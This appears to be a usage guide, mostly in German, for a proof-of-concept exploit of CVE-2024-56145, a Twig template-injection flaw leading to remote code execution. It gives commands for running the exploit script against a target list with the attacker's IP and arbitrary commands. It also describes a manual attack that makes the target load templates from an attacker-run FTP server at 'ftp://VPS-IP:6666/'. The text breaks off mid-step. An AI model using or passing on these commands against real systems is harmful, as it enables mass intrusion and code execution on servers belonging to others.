
CVE-2024-56145 SSTI zu RCE - Twig-Vorlagen
fuser -k 6666/tcp
python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200
Ein benutzerdefinierter Befehl kann wie folgt verwendet werden: python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"
-i ist Ihre IP oder Ihre VPS-IP (verwenden Sie diese, indem Sie ipconfig / ifconfig ausführen).
Wie zum Beispiel - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200
Und jetzt? Sie haben ein verwundbares Ziel, möchten aber noch mehr ausprobieren? Daher habe ich poc2.py hinzugefügt. Dies ist für einen manuellen Test gegen das Ziel. Wie macht man das?
Führen Sie Folgendes aus:
fuser -k 6666/tcp
1. Run poc2.py (port 6666 started as FTP).
2. Open the browser yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. you will see -

Geschrieben von Chirag Artani (https://x.com/Chirag99Artani)